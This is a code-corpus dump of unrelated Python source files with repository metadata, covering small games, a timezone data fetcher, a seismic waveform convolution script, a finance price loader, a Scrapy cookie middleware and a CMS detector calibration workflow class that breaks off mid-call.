| ShuP1/AoC | src/2015/22.py | 22.py | py | 1,546 | python | en | code | 0 | github-code | 50 |
23321370519 | import random
# A list of words that
potential_words = ["code", "sisterhood", "program", "empower", "team", "atom", "technology", "notebook", "marker"]
word = random.choice(potential_words)
# Use to test your code:
#print(word)
# Converts the word to lowercase
word = word.lower()
# Make it a list of letters for someone to guess
current_word = [] # TIP: the number of letters should match the word
for i in range(len(word)):
current_word.append("_")
print (current_word)
# Some useful variables
guesses = []
maxfails = 7
fails = 0
while fails < maxfails:
guess = input("Guess a letter or word: ")
# check if the guess is valid: Is it one letter? Have they already guessed it?
if guess in word:
if len(guess) == 1: #letter
for g in range(len(word)):
if guess == word[g]:
current_word[g] = guess
elif guess == word:
print ("You have guessed the word!")
break
# check if the guess is correct: Is it in the word? If so, reveal the letters!
print(current_word)
if "_" in current_word:
fails = fails+1
print("You have " + str(maxfails - fails) + " tries left!")
else:
print ("You have guessed the word!")
break
| gomezquinteroD/GWC2019 | Python/GuessWord.py | GuessWord.py | py | 1,262 | python | en | code | 0 | github-code | 50 |
37945910633 | #-----Las biblotecas de uso------------
from tkinter import *
from PIL import ImageTk, Image #importar imagen
from tkinter import messagebox
import os
import subprocess
#-------------------------------------------Metodos para llmar otros proyectos--------------------------
def animales():
# Ruta al archivo del proyecto que deseas ejecutar
ruta_proyecto = 'animales.py' # Reemplaza con la ruta adecuada a tu proyecto
try:
# Ejecuta el proyecto utilizando la función subprocess.call()
subprocess.call(['python', ruta_proyecto])
except FileNotFoundError:
print(f'El archivo del proyecto no fue encontrado: {ruta_proyecto}')
def Paises():
# Ruta al archivo del proyecto que deseas ejecutar
ruta_proyecto = 'paises.py' # Reemplaza con la ruta adecuada a tu proyecto
try:
# Ejecuta el proyecto utilizando la función subprocess.call()
subprocess.call(['python', ruta_proyecto])
except FileNotFoundError:
print(f'El archivo del proyecto no fue encontrado: {ruta_proyecto}')
def Deportes():
# Ruta al archivo del proyecto que deseas ejecutar
ruta_proyecto = 'deportes.py' # Reemplaza con la ruta adecuada a tu proyecto
try:
# Ejecuta el proyecto utilizando la función subprocess.call()
subprocess.call(['python', ruta_proyecto])
except FileNotFoundError:
print(f'El archivo del proyecto no fue encontrado: {ruta_proyecto}')
#-------------------------------------------Ventana Principal-------------------------------
raiz = Tk() #Crea la ventana
raiz.title("Principal") #titulo de la ventana
global dimension_entry,verticales_entry,horizontales_entry,casillas_nulas_entry,palabra_resultante_entry
ancho_ventana = 900
alto_ventana = 600
ancho_pantalla = raiz.winfo_screenwidth()
alto_pantalla = raiz.winfo_screenheight()
posicion_x = int((ancho_pantalla / 2) - (ancho_ventana / 2))
posicion_y = int((alto_pantalla / 2) - (alto_ventana / 2))
raiz.geometry(f"{ancho_ventana}x{alto_ventana}+{posicion_x}+{posicion_y}") # Establecer el tamaño y posición de la ventana
#-----------------------------------------Ventana principal-------------------------------
#--------------------Fondo de la ventana------------------------
imagen_fondo = Image.open("mente.png")
imagen_fondo = ImageTk.PhotoImage(imagen_fondo)
label_fondo = Label(raiz, image=imagen_fondo)
label_fondo.place(x=0, y=0, relwidth=1, relheight=1)
#---------------------------------------------------------------
def abri_ventana():
global ventana
raiz.withdraw() #cierra la ventana principal raiz
global imagen
ventana= Toplevel(raiz)#Crea la ventana
ventana.title("Juego Cucigrama")#titulo de la ventana
ancho_ventana2 = 900
alto_ventana2 = 600
ancho_pantalla2 = ventana.winfo_screenwidth()
alto_pantalla2 = ventana.winfo_screenheight()
posicion_x2 = int((ancho_pantalla2 / 2) - (ancho_ventana2 / 2))
posicion_y2 = int((alto_pantalla2 / 2) - (alto_ventana2 / 2))
ventana.geometry(f"{ancho_ventana2}x{alto_ventana2}+{posicion_x2}+{posicion_y2}")
#----------------------------Fondo------------------------------------------------
imagen= ImageTk.PhotoImage(Image.open("mente.png"))
label_fondo2 = Label(ventana, image=imagen)
label_fondo2.place(x=0, y=0, relwidth=1, relheight=1)
#-----------------------------------El tiulo principal de la ventana----------------
label = Label(ventana, text="Bienvenidos al juedo cucigrama", font=("Castellar", 14), fg="white", bg="#c20000")
label.pack()
#Boton para abrir la tercera ventana
boton_1 = Button(ventana, text="Jugar",font=("Castellar", 14), fg="white", bg="#c20000", command=lambda:ventana_Jugar())
boton_1.pack(side="right", padx=10, pady=(500, 10))
# Botón para regresar a la ventana principal
boton_regresar = Button(ventana, text="➢",font=("Castellar", 14), fg="white", bg="#c20000",command=lambda:regresar_ventana())
boton_regresar.pack(side="left", padx=10, pady=(500, 10))
#--------------------------------------------Configuracion de la ventana usario------------------------------------------------
def ventana_Jugar():
global ventana_usuario
ventana.withdraw()
global imagen3
ventana_usuario= Toplevel(raiz)#Crea la ventana
ventana_usuario.title("Seleccion")#titulo de la ventana
ancho_ventana2 = 900
alto_ventana2 = 600
ancho_pantalla2 = ventana_usuario.winfo_screenwidth()
alto_pantalla2 = ventana_usuario.winfo_screenheight()
posicion_x2 = int((ancho_pantalla2 / 2) - (ancho_ventana2 / 2))
posicion_y2 = int((alto_pantalla2 / 2) - (alto_ventana2 / 2))
ventana_usuario.geometry(f"{ancho_ventana2}x{alto_ventana2}+{posicion_x2}+{posicion_y2}")# Establecer el tamaño y posición de la ventana
#----------------------------Fondo------------------------------------------------
imagen3= ImageTk.PhotoImage(Image.open("preguntados.png"))
label_fondo3 = Label(ventana_usuario, image=imagen3)
label_fondo3.place(x=0, y=0, relwidth=1, relheight=1)
#-----------------------------------El tiulo principal de la ventana----------------
label = Label(ventana_usuario, text="Crucigrama", font=("Castellar", 14), fg="white", bg="#c20000")
label.pack()
#--------------------------------------Los botones de la ventana----------------------
boton_resolver = Button(ventana_usuario, text="Resolver Crucigrama Animales", font=("Castellar", 10), fg="white", bg="#c20000",command=lambda:animales())
boton_resolver.pack(side="left", padx=10, pady=(500, 10))
boton_resolver = Button(ventana_usuario, text="Resolver Crucigrama Paises", font=("Castellar", 10), fg="white", bg="#c20000",command=lambda:Paises())
boton_resolver.pack(side="left", padx=10, pady=(500, 10))
boton_resolver = Button(ventana_usuario, text="Resolver Crucigrama Deportes", font=("Castellar", 10), fg="white", bg="#c20000",command=lambda:Deportes())
boton_resolver.pack(side="left", padx=10, pady=(500, 10))
boton_4 = Button(ventana_usuario, text="➢",font=("Castellar", 14), fg="white", bg="#c20000",command=lambda:regresar_juagr())
boton_4.pack(side="right", padx=10, pady=(500, 10))
#-----------------------------------Metodo de regresara la ventana-------------------------------------------
def regresar_ventana():
ventana.destroy() # Cerrar la ventana "Juego Cucigrama"
raiz.deiconify() # Mostrar la ventana principal nuevamente
def regresar_juagr():
ventana_usuario.destroy() # Cerrar la ventana "Usario"
ventana.deiconify() # Mostrar la ventana seleccion nuevamente
#-----------------------------------Metodo de regresara la ventana-------------------------------------------
#------------------------Crear el boton princinpal-----------------
boton = Button(raiz, text="Iniciar juego",font=("Castellar", 18), fg="white", bg="#c20000",command=lambda:abri_ventana())
boton.pack(side="right", padx=10, pady=(150, 10), anchor="se")
#----------------------se monostrara en la ventana----------------------------------------
raiz.mainloop() #Lo que muestra en la ventana | Genesis-BQ/Crucigrama- | Juego cucigrama.py | Juego cucigrama.py | py | 7,093 | python | es | code | 0 | github-code | 50 |
20611233178 | #! /usr/bin/env python3
'''
This modules list the files to install/copy.
Used by both nao_sync and createArchive
'''
CHMOD_GO_NONE = 'go= '
'''
Lists, in order, files to install.
Array order determines the order of copying.
Element descriptions
description: Description of the element
src: File in Git repo to copy relative to RBB_CHECKOUT_DIR
dest: Destination on robot/archive to copy to relative to /home/nao
directory: True if the element to install is a directory of contents
naosync: True if should be synched by nao_sync
archive: True if should be included by createArchive
chmod: chmod rule for nao_sync
'''
installFiles = [
{
"description": "Authorized Keys",
"src": "Install/NaoHome/.ssh/authorized_keys",
"dest": ".ssh/",
"directory": False,
"naosync": "AllOnly",
"archive": True,
"chmod": CHMOD_GO_NONE
},
{
"description": "Nao Image home folder",
"src": "Install/NaoHome",
"dest": "",
"directory": True,
"naosync": "Always",
"archive": True,
"chmod": CHMOD_GO_NONE
},
{
"description": "Robot Configuration Files",
"src": "Config/Robots",
"dest": "config/Robots",
"directory": True,
"naosync": "AllOnly",
"archive": True,
"chmod": CHMOD_GO_NONE
},
{
"description": "Robot Sound Files",
"src": "Config/Sounds",
"dest": "config/Sounds",
"directory": True,
"naosync": "AllOnly",
"archive": True,
"chmod": CHMOD_GO_NONE
},
{
"description": "Robot source files (behaviours/config/etc.)",
"src": "Src/behaviours",
"dest": "data/behaviours",
"directory": True,
"naosync": "Always",
"archive": True,
"chmod": CHMOD_GO_NONE
},
{
"description": "Wireless Profiles",
"src": "Install/Profiles",
"dest": "Profiles",
"directory": True,
"naosync": "AllOnly",
"archive": True,
"chmod": CHMOD_GO_NONE
},
{
"description": "ML Model Files",
"src": "Install/MLModels",
"dest": "data",
"directory": True,
"naosync": "AllOnly",
"archive": True,
"chmod": CHMOD_GO_NONE
},
]
'''
Lists all of the services to install (and link)
'''
services = [
'alsa-kludge',
'hal',
'lola',
'rbb'
]
| rmit-computing-technologies/redbackbots-coderelease | Make/Common/rbbpython/install.py | install.py | py | 2,439 | python | en | code | 0 | github-code | 50 |
43329466705 | #!/usr/bin/env python
# this program convolves a time function with an mseed file
# John Vidale 6/2019
def pro2_convstf(eq_num, conv_file):
from obspy import UTCDateTime
from obspy import Stream, Trace
from obspy import read
# from obspy.signal import correlate_template
import os
import time
import numpy as np
import sys
import warnings
# if not sys.warnoptions: # don't show any warnings
# warnings.simplefilter('ignore')
print('Running pro2_con_stfs')
start_time_wc = time.time()
#%%
taper_frac = .05 #Fraction of window tapered on both ends
# conv_file = 'HD1971-11-06_stf'
#%% input event data with 1-line file of format
# event 2016-05-28T09:47:00.000 -56.241 -26.935 78
# folder_name = '/Users/vidale/Documents/Research/IC/'
# file = open(folder_name + 'EvLocs/' + eq_file, 'r')
fname = '/Users/vidale/Documents/Research/IC/EvLocs/event' + str(eq_num) + '.txt'
file = open(fname, 'r')
lines=file.readlines()
split_line = lines[0].split()
# ids.append(split_line[0]) ignore label for now
t = UTCDateTime(split_line[1])
date_label = split_line[1][0:10]
print('date_label ' + date_label + ' time ' + str(t))
#%% Load waveforms and convolution trace
st = Stream()
con_trace = Stream()
st_out = Stream()
tr = Trace()
fname_sel = '/Users/vidale/Documents/Research/IC/Pro_Files/HD' + date_label + 'sel.mseed'
st = read(fname_sel)
fname = conv_file
con_trace = read(fname)
con_trace.taper(0.5) # added June 10, 2019 to shorten stf
nt = len(st[0].data)
dt = st[0].stats.delta
print('Read in:\n' + str(len(st)) + ' traces' + ' from file ' + fname +
', \n' + str(nt) + ' time pts, time sampling of '
+ str(dt) + ' and thus duration of ' + str((nt-1)*dt))
#%% detrend, taper
st.detrend(type='simple')
st.taper(taper_frac)
# st3 = Stream()
# st3 = correlate_template(st, con_trace, normalize='none')
done = 0
for tr in st: # traces one by one, find lat-lon by searching entire inventory. Inefficient but cheap
# print('con_trace data has length ' + str(len(con_trace[0].data)))
# print('Tr data has length ' + str(len(tr.data)) + ' con_trace data has length ' + str(len(con_trace[0].data)))
tr.data = np.convolve(tr.data, con_trace[0].data)
# print('Now, Tr data has length ' + str(len(tr.data)))
tr.stats.starttime = tr.stats.starttime - 9 # shift timing to reflect convolution delay
st_out += tr
done += 1
if done%50 == 0:
print('Done stacking ' + str(done) + ' out of ' + str(len(st)) + ' stations.')
nt = len(st_out[0].data)
dt = st_out[0].stats.delta
print('After detrend and taper:\n' + str(len(st_out)) + ' traces written to file ' + fname_sel +
', ' + str(nt) + ' time pts, time sampling of '
+ str(dt) + ' and thus duration of ' + str((nt-1)*dt))
# Save processed files
st_out.write(fname_sel,format = 'MSEED')
elapsed_time_wc = time.time() - start_time_wc
print('This job took ' + str(elapsed_time_wc) + ' seconds')
os.system('say "Done"') | JohnVidale/Array_codes | Process/pro2_con_stfs.py | pro2_con_stfs.py | py | 3,254 | python | en | code | 2 | github-code | 50 |
32081040709 | import os
import json
import requests
import tarfile
# Directory where you want to extract the contents
output_directory = "output"
def fetch_IANA_time_zone_database(output_directory):
# API URL for downloading the latest database
database_api_url = "https://data.iana.org/time-zones/tzdata-latest.tar.gz"
# Ensure the output directory exists or create it
os.makedirs(output_directory, exist_ok=True)
# Fetch the latest database from the API
print("Fetching latest database from API...")
response = requests.get(database_api_url)
# Check if the request was successful
if response.status_code == 200:
# Save the downloaded data to a temporary file
with open("tzdata-latest.tar.gz", "wb") as temp_file:
temp_file.write(response.content)
# Extract the downloaded file to the output directory
with tarfile.open("tzdata-latest.tar.gz", "r:gz") as tar:
tar.extractall(output_directory)
# Remove the temporary downloaded file
os.remove("tzdata-latest.tar.gz")
print("Database extraction completed.")
else:
print(f"Failed to fetch the database from the API. Status code: {response.status_code}")
exit(1)
def create_country_to_time_zone_mapping():
print("Creating country to timezones mapping...")
# Path to the zone.tab file
zone_tab_file = os.path.join(output_directory, "zone1970.tab")
# Create a dictionary to store the country code to time zones mapping
country_to_timezones = {}
# Read the zone.tab file and populate the mapping
with open(zone_tab_file, "r") as file:
for line in file:
if line.strip() and not line.startswith("#"):
parts = line.split()
if len(parts) >= 3:
country_code = parts[0]
time_zone = parts[2]
# Append the time zone to the list for the country code
country_to_timezones.setdefault(country_code, []).append(time_zone)
return country_to_timezones
def dump_time_zone_details(country_to_timezones):
print("Dumping your file to JSON...")
# Initialize a dictionary to store timezones for each country
country_timezones = {}
# Iterate through the data and group by country code
for country_codes, timezones in country_to_timezones.items():
# Split multiple country codes if present
country_codes = country_codes.split(',')
for country_code in country_codes:
country_code = country_code.strip()
if(country_timezones.get(country_code) is None):
country_timezones[country_code] = []
country_timezones[country_code] += timezones;
# Define the path to the JSON file where you want to store the mapping
json_file_path = "country_to_timezones.json"
# Store the mapping in a JSON file
with open(json_file_path, "w") as json_file:
json.dump(country_timezones, json_file, indent=2)
print(f"Mapping saved to {json_file_path}")
fetch_IANA_time_zone_database(output_directory)
dump_time_zone_details(create_country_to_time_zone_mapping())
| shan-shaji/country-code-from-timezone | refresh.py | refresh.py | py | 3,196 | python | en | code | 0 | github-code | 50 |
70816688477 | import pytest
import uuid
from os.path import exists, join
from src.report_generator import ReportGenerator
from tests import utils as test_utils
@pytest.fixture
def rep_gen(tmp_path):
temp_reports = tmp_path / 'reports'
temp_reports.mkdir()
_rep_gen=ReportGenerator(reports_folder=temp_reports, temps_folder=test_utils.TEMPLATE_FOLDER, data=test_utils.data)
_rep_gen.filename = join(temp_reports, str(uuid.uuid4()).replace('-', ''))
return _rep_gen
def test_to_pdf(rep_gen, tmp_path):
pdf_file = f"{rep_gen.filename}.pdf"
assert exists(tmp_path / 'reports')
assert not exists(pdf_file)
rep_gen.to_pdf(test_utils.TEMPLATE_FILE)
assert exists(pdf_file)
def test_to_xml(rep_gen, tmp_path):
xml_file = f"{rep_gen.filename}.xml"
assert exists(tmp_path / 'reports')
assert not exists(xml_file)
rep_gen.to_xml()
assert exists(xml_file)
def test_run(rep_gen):
'''Ensure that both the PDF and XML reports are generated and saved to the filesystem
'''
# Ensure reports are generated and stored
pdf_file = f"{rep_gen.filename}.pdf"
xml_file = f"{rep_gen.filename}.xml"
assert not exists(pdf_file)
assert not exists(xml_file)
rep_gen.run(test_utils.TEMPLATE_FILE)
assert exists(pdf_file)
assert exists(xml_file)
# ensure filename property returns the filename without extension
assert rep_gen.filename
assert '.' not in rep_gen.filename
| d2gex/py-rep-to-pdf_xml | tests/test_report_generator.py | test_report_generator.py | py | 1,449 | python | en | code | 0 | github-code | 50 |
14202375433 | """Api - Puzzle api
Usage: api run [--config <file>]
api serve [--config <file>]
api --help
api --version
Options:
-h --help Show this screen.
--config <file> Set config file. [default: site.cfg]
Subcommands:
run - Start the web server in the foreground. Don't use for production.
serve - Starts a daemon web server with Gevent.
"""
from __future__ import print_function
from __future__ import absolute_import
from gevent import monkey
monkey.patch_all()
from docopt import docopt
from .app import make_app
from api.tools import loadConfig
def main():
""""""
args = docopt(__doc__, version="0.0")
config_file = args["--config"]
appconfig = loadConfig(config_file)
cookie_secret = appconfig.get("SECURE_COOKIE_SECRET")
if args["run"]:
run(config_file, cookie_secret=cookie_secret)
if args["serve"]:
serve(config_file, cookie_secret=cookie_secret)
if __name__ == "__main__":
main()
def run(config_file, cookie_secret):
"Start the web server in the foreground. Don't use for production."
app = make_app(
config=config_file, cookie_secret=cookie_secret, database_writable=True
)
app.run(
host=app.config.get("HOSTAPI"),
port=app.config.get("PORTAPI"),
use_reloader=True,
)
def serve(config_file, cookie_secret):
from gevent import pywsgi, signal_handler
import signal
app = make_app(
config=config_file, cookie_secret=cookie_secret, database_writable=True
)
host = app.config.get("HOSTAPI")
port = app.config.get("PORTAPI")
print("serving on {host}:{port}".format(**locals()))
server = pywsgi.WSGIServer((host, port), app)
def shutdown():
app.logger.info("api is being shutdown")
server.stop(timeout=10)
exit(signal.SIGTERM)
signal_handler(signal.SIGTERM, shutdown)
signal_handler(signal.SIGINT, shutdown)
server.serve_forever(stop_timeout=10)
| jkenlooper/puzzle-massive | api/api/script.py | script.py | py | 1,993 | python | en | code | 31 | github-code | 50 |
70740650077 | from scipy.optimize import minimize
import numpy as np
import pandas as pd
import datetime as dt
import copy
import matplotlib.pyplot as plt
from sklearn.linear_model import LinearRegression
import sklearn
import time
import math
import plotly.express as px
import plotly.graph_objects as go
from cvxpy import *
from scipy.optimize import nnls
#import scipy.optimize
from datetime import datetime
from scipy.optimize import nnls
import seaborn as sns
import urllib
from sqlalchemy import create_engine
import pyodbc
import yfinance as yf
import investpy
import openpyxl
from openpyxl import Workbook
from openpyxl.utils import get_column_letter, FORMULAE
from datetime import timedelta
import database_directory
conn_str = database_directory.main()
cnn_url = f"access+pyodbc:///?odbc_connect={urllib.parse.quote_plus(conn_str)}"
acc_engine = create_engine(cnn_url)
def download_bloomberg_tickers(hist_data,update_days_time):
df_fund_index = pd.read_sql("SELECT * FROM AssetIndex ",acc_engine).sort_values("ID_INSTRUMENT")
df_fund_index = df_fund_index[df_fund_index["Instrument_Type"] == "Index"]
bb_ids = list(df_fund_index[df_fund_index["data_source"] == "bloomberg"]["ID_INSTRUMENT"].values)
non_bb_ids = list(df_fund_index[df_fund_index["data_source"] != "bloomberg"]["ID_INSTRUMENT"].values)
old_bb_ids = list(pd.read_sql("SELECT ID_INSTRUMENT FROM PriceIndex",acc_engine).sort_values("ID_INSTRUMENT")["ID_INSTRUMENT"].unique())
old_bb_ids = list(set(old_bb_ids).symmetric_difference(set(non_bb_ids)))
new_bb_ids = list(set(old_bb_ids).symmetric_difference(set(bb_ids)))
wb = Workbook()
ws1 = wb.active
ws1["A1"] = "ISIN"
ws1["A2"] = "BB_Ticker"
if hist_data == True:
start_date = "01/01/2000"
df_fund_index = df_fund_index[np.isin(df_fund_index, new_bb_ids).any(axis=1)]
days_ret = 5900
else:
start_date = datetime.today() - timedelta(days=update_days_time) # Last 8 days
start_date = start_date.strftime("%d/%m/%Y")
df_fund_index = df_fund_index[np.isin(df_fund_index, old_bb_ids).any(axis=1)]
days_ret = update_days_time
for i in range(0,len(df_fund_index["ID_INSTRUMENT"])):
column_number = i+2
letter_columns = get_column_letter(column_number)
row_value_1 =letter_columns +str(1)
row_value_2 = letter_columns + str(2)
row_value_3 = letter_columns +str(3)
id_instrument = df_fund_index["ID_INSTRUMENT"].iloc[i]
df_price_exists = pd.read_sql("SELECT * FROM PriceIndex WHERE ID_INSTRUMENT ={}".format(id_instrument),acc_engine)
ws1[row_value_1] = df_fund_index["code"].iloc[i]
ws1[row_value_2] =df_fund_index["code"].iloc[i]
if row_value_3 == "B3":
ws1["A3"] = 'replace_ti=BDH({};"PX_LAST";"{}";"";"Dir=V";"CDR=5D";"CshAdjNormal=Y";"CshAdjAbnormal=Y";"CapChg=Y";"Days=A";"Dts=S";"FX=USD";"cols=1;rows={}")'.format(row_value_2,start_date,days_ret)
else:
ws1[row_value_3] = 'replace_ti=BDH({};"PX_LAST";"{}";"";"Dir=V";"CDR=5D";"CshAdjNormal=Y";"CshAdjAbnormal=Y";"CapChg=Y";"Days=A";"Dts=H";"FX=USD";"cols=1;rows={}")'.format(row_value_2,start_date,days_ret)
if hist_data == True:
wb.save(filename =r"P:\Public\LuanF\L_S_Strat\BB_import\bb_import_new_data.xlsx")
else:
wb.save(filename =r"P:\Public\LuanF\L_S_Strat\BB_import\bb_import_old_data.xlsx")
pass
def yahoo_finance_data(id_instrument):
asset_index = pd.read_sql("SELECT * FROM AssetIndex WHERE ID_INSTRUMENT ={}".format(id_instrument),acc_engine)
id_instrument = asset_index["ID_INSTRUMENT"].values[0]
ticker = asset_index["code"].values[0]
df_price_exists = pd.read_sql("SELECT * FROM PriceIndex WHERE ID_INSTRUMENT = {}".format(id_instrument),acc_engine).sort_values("Data")
if df_price_exists.empty:
current_date = datetime.now().strftime("%Y-%m-%d")
df_price = yf.download(ticker,'2008-1-1', current_date)
df_price = df_price.astype(float)
df_price["ID_INSTRUMENT"] = id_instrument
df_price.reset_index(inplace = True)
df_price.rename(columns = {"Date":"Data"},inplace = True)
df_price.rename(columns = {"Adj Close":"Adj_Close"},inplace = True)
df_price.set_index("ID_INSTRUMENT",inplace = True)
df_price.to_sql("PriceIndex",acc_engine,if_exists = "append")
print("New price Data for ID: {} ".format(id_instrument))
else:
last_price_date = str((df_price_exists.iloc[-1]["Data"]).strftime("%Y-%m-%d"))
current_date = str(datetime.now().strftime("%Y-%m-%d"))
if current_date == last_price_date:
print("Data is already up to date")
pass
else:
df_price = yf.download(ticker,last_price_date, current_date)
df_price = df_price.iloc[1::]
df_price = df_price.astype(float)
df_price["ID_INSTRUMENT"] = id_instrument
df_price.reset_index(inplace = True)
df_price.rename(columns = {"Date":"Data"},inplace = True)
df_price.rename(columns = {"Adj Close":"Adj_Close"},inplace = True)
df_price.set_index("ID_INSTRUMENT",inplace = True)
df_price.to_sql("PriceIndex",acc_engine,if_exists = "append")
print("Data for ID: {} was updated".format(id_instrument))
def get_data():
unique_ids = pd.read_sql("SELECT ID_INSTRUMENT,data_source FROM AssetIndex",acc_engine)
unique_ids = unique_ids[unique_ids["data_source"] != "bloomberg"]
#unique_ids = unique_ids[unique_ids["ID_INSTRUMENT"]==10]
for i,x in zip(unique_ids["ID_INSTRUMENT"],unique_ids["data_source"]):
yahoo_finance_data(i)
def main():
get_data()
main() | LusoNX/LongShort-Cointegration-Pairwise-Strategy | Long_SHORT_GIT_HUB/price_data.py | price_data.py | py | 5,762 | python | en | code | 0 | github-code | 50 |
73034668955 | # -*- coding: utf-8 -*-
# Define here the models for your spider middleware
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/spider-middleware.html
import json
import logging
import requests
from requests.exceptions import ConnectionError
from scrapy.exceptions import IgnoreRequest
class CookiesMiddleWare():
def __init__(self, cookies_pool_url):
self.logger = logging.getLogger(__name__)
self.cookies_pool_url = cookies_pool_url
def _get_random_cookies(self):
try:
#先开启cookie_pool的python项目,使用flask提供cookie
response = requests.get(self.cookies_pool_url)
if response.status_code == 200:
return json.loads(response.text)
except ConnectionError:
return None
def process_request(self, request, spider):
cookies = self._get_random_cookies()
if cookies:
request.cookies = cookies
self.logger.debug('Using Cookies ' + json.dumps(cookies))
else:
self.logger.debug('No Valid Cookies')
@classmethod
def from_crawler(cls, crawler):
return cls(
cookies_pool_url=crawler.settings.get('COOKIES_POOL_URL')
)
#处理页面重定向问题
def process_response(self, request, response, spider):
if response.status in [300, 301, 302, 303]:
try:
redirect_url = response.headers['location']
#重定向到登录界面,说明cookie失效了,需要重新获取该账号的cookie
if 'login.weibo' in redirect_url or 'login.sina' in redirect_url: # Cookie失效
self.logger.warning('Updating Cookies')
#重定向到账号解封页面,说明账号被封了
elif 'weibo.cn/security' in redirect_url:
self.logger.warning('Now Cookies' + json.dumps(request.cookies))
self.logger.warning('One Account is locked!')
#返回一个新的request对象,并且重新设置cookie,此时中间件链停止, 返回的request会被重新调度下载。
request.cookies = self._get_random_cookies()
self.logger.debug('Using Cookies' + json.dumps(request.cookies))
return request
except Exception:
raise IgnoreRequest
#客户端发送的 HTTP 数据流包含一个过长网址, 即字节太多,被服务器414拒绝了,此时重新发送request
elif response.status in [414]:
return request
else:
return response
| XiMuYouZi/Python-crawler-demo | Crawler/Weibo/weibo/middlewares.py | middlewares.py | py | 2,644 | python | en | code | 0 | github-code | 50 |
32592221413 | import sys
arr=[]
def push(n):
arr.append(n)
def pop():
if len(arr)==0:
print(-1)
else: print(arr.pop(-1))
def size():
print(len(arr))
def empty():
if len(arr)==0:
print(1)
else: print(0)
def top():
if len(arr)==0:
print(-1)
else: print(arr[-1])
n=int(sys.stdin.readline())
for _ in range(n):
msg=list(map(str,sys.stdin.readline().split()))
if len(msg)==2:
push(int(msg[1]))
else:
if msg[0]=="top": top()
elif msg[0]=="size": size()
elif msg[0]=="empty": empty()
elif msg[0]=="pop": pop() | san9w9n/2020_WINTER_ALGO | 10828.py | 10828.py | py | 598 | python | en | code | 0 | github-code | 50 |
40099699490 | from __future__ import print_function
from __future__ import absolute_import
import os,sys
import glob
import logging
import argparse
import subprocess
import time, datetime
import urllib2
import json
from . import tools
from .CLIHelper import CLIHelper
from .CrabHelper import CrabHelper
import FWCore.ParameterSet.Config as cms
log = logging.getLogger(__name__)
class DTWorkflow(CLIHelper, CrabHelper):
""" This is the base class for all DTWorkflows and contains some
common tasks """
def __init__(self, options):
self.options = options
super( DTWorkflow, self ).__init__()
self.digilabel = "muonDTDigis"
# dict to hold required variables. Can not be marked in argparse to allow
# loading of options from config
self.required_options_dict = {}
self.required_options_prepare_dict = {}
self.fill_required_options_dict()
self.fill_required_options_prepare_dict()
# These variables are determined in the derived classes
self.pset_name = ""
self.outpath_command_tag = ""
self.output_files = []
self.input_files = []
self.run_all_command = False
self.files_reveived = False
self._user = ""
# change to working directory
os.chdir(self.options.working_dir)
def check_missing_options(self, requirements_dict):
missing_options = []
# check if all required options exist
if self.options.command in requirements_dict:
for option in requirements_dict[self.options.command]:
if not (hasattr(self.options, option)
and ( (getattr(self.options,option))
or isinstance(getattr(self.options,option), bool) )):
missing_options.append(option)
if len(missing_options) > 0:
err = "The following CLI options are missing"
err += " for command %s: " % self.options.command
err += " ".join(missing_options)
raise ValueError(err)
def run(self):
""" Generalized function to run workflow command"""
msg = "Preparing %s workflow" % self.options.workflow
if hasattr(self.options, "command"):
msg += " for command %s" % self.options.command
log.info(msg)
if self.options.config_path:
self.load_options( self.options.config_path )
#check if all options to prepare the command are used
self.check_missing_options(self.required_options_prepare_dict)
self.prepare_workflow()
# create output folder if they do not exist yet
if not os.path.exists( self.local_path ):
os.makedirs(self.local_path)
# dump used options
self.dump_options()
#check if all options to run the command are used
self.check_missing_options(self.required_options_dict)
try:
run_function = getattr(self, self.options.command)
except AttributeError:
errmsg = "Class `{}` does not implement `{}` for workflow %s" % self.options.workflow
if hasattr(self.options, "workflow_mode"):
errmsg += "and workflow mode %s" % self.options.workflow_mode
raise NotImplementedError( errmsg.format(self.__class__.__name__,
self.options.command))
log.debug("Running command %s" % self.options.command)
# call chosen function
run_function()
def prepare_workflow(self):
""" Abstract implementation of prepare workflow function"""
errmsg = "Class `{}` does not implement `{}`"
raise NotImplementedError( errmsg.format(self.__class__.__name__,
"prepare_workflow"))
def all(self):
""" generalized function to perform several workflow mode commands in chain.
All commands mus be specified in self.all_commands list in workflow mode specific
prepare function in child workflow objects.
"""
self.run_all_command = True
for command in self.all_commands:
self.options.command = command
self.run()
def submit(self):
self.submit_crab_task()
def check(self):
""" Function to check status of submitted tasks """
self.check_crabtask()
def write(self):
self.runCMSSWtask()
def dump(self):
self.runCMSSWtask()
def correction(self):
self.runCMSSWtask()
def add_preselection(self):
""" Add preselection to the process object stored in workflow_object"""
if not hasattr(self, "process"):
raise NameError("Process is not initalized in workflow object")
pathsequence = self.options.preselection.split(':')[0]
seqname = self.options.preselection.split(':')[1]
self.process.load(pathsequence)
tools.prependPaths(self.process, seqname)
def add_raw_option(self):
getattr(self.process, self.digilabel).inputLabel = 'rawDataCollector'
tools.prependPaths(self.process,self.digilabel)
def add_local_t0_db(self, local=False):
""" Add a local t0 database as input. Use the option local is used
if the pset is processed locally and not with crab.
"""
if local:
connect = os.path.abspath(self.options.inputT0DB)
else:
connect = os.path.basename(self.options.inputT0DB)
self.addPoolDBESSource( process = self.process,
moduleName = 't0DB',
record = 'DTT0Rcd',
tag = 't0',
connect = 'sqlite_file:%s' % connect)
self.input_files.append(os.path.abspath(self.options.inputT0DB))
def add_local_vdrift_db(self, local=False):
""" Add a local vdrift database as input. Use the option local is used
if the pset is processed locally and not with crab.
"""
if local:
connect = os.path.abspath(self.options.inputVDriftDB)
else:
connect = os.path.basename(self.options.inputVDriftDB)
self.addPoolDBESSource( process = self.process,
moduleName = 'vDriftDB',
record = 'DTMtimeRcd',
tag = 'vDrift',
connect = 'sqlite_file:%s' % connect)
self.input_files.append( os.path.abspath(self.options.inputVDriftDB) )
def add_local_calib_db(self, local=False):
""" Add a local calib database as input. Use the option local is used
if the pset is processed locally and not with crab.
"""
label = ''
if self.options.datasettype == "Cosmics":
label = 'cosmics'
if local:
connect = os.path.abspath(self.options.inputCalibDB)
else:
connect = os.path.basename(self.options.inputCalibDB)
self.addPoolDBESSource( process = self.process,
moduleName = 'calibDB',
record = 'DTTtrigRcd',
tag = 'ttrig',
connect = str("sqlite_file:%s" % connect),
label = label
)
self.input_files.append( os.path.abspath(self.options.inputCalibDB) )
def add_local_custom_db(self):
for option in ('inputDBRcd', 'connectStrDBTag'):
if hasattr(self.options, option) and not getattr(self.options, option):
raise ValueError("Option %s needed for custom input db" % option)
self.addPoolDBESSource( process = self.process,
record = self.options.inputDBRcd,
tag = self.options.inputDBTag,
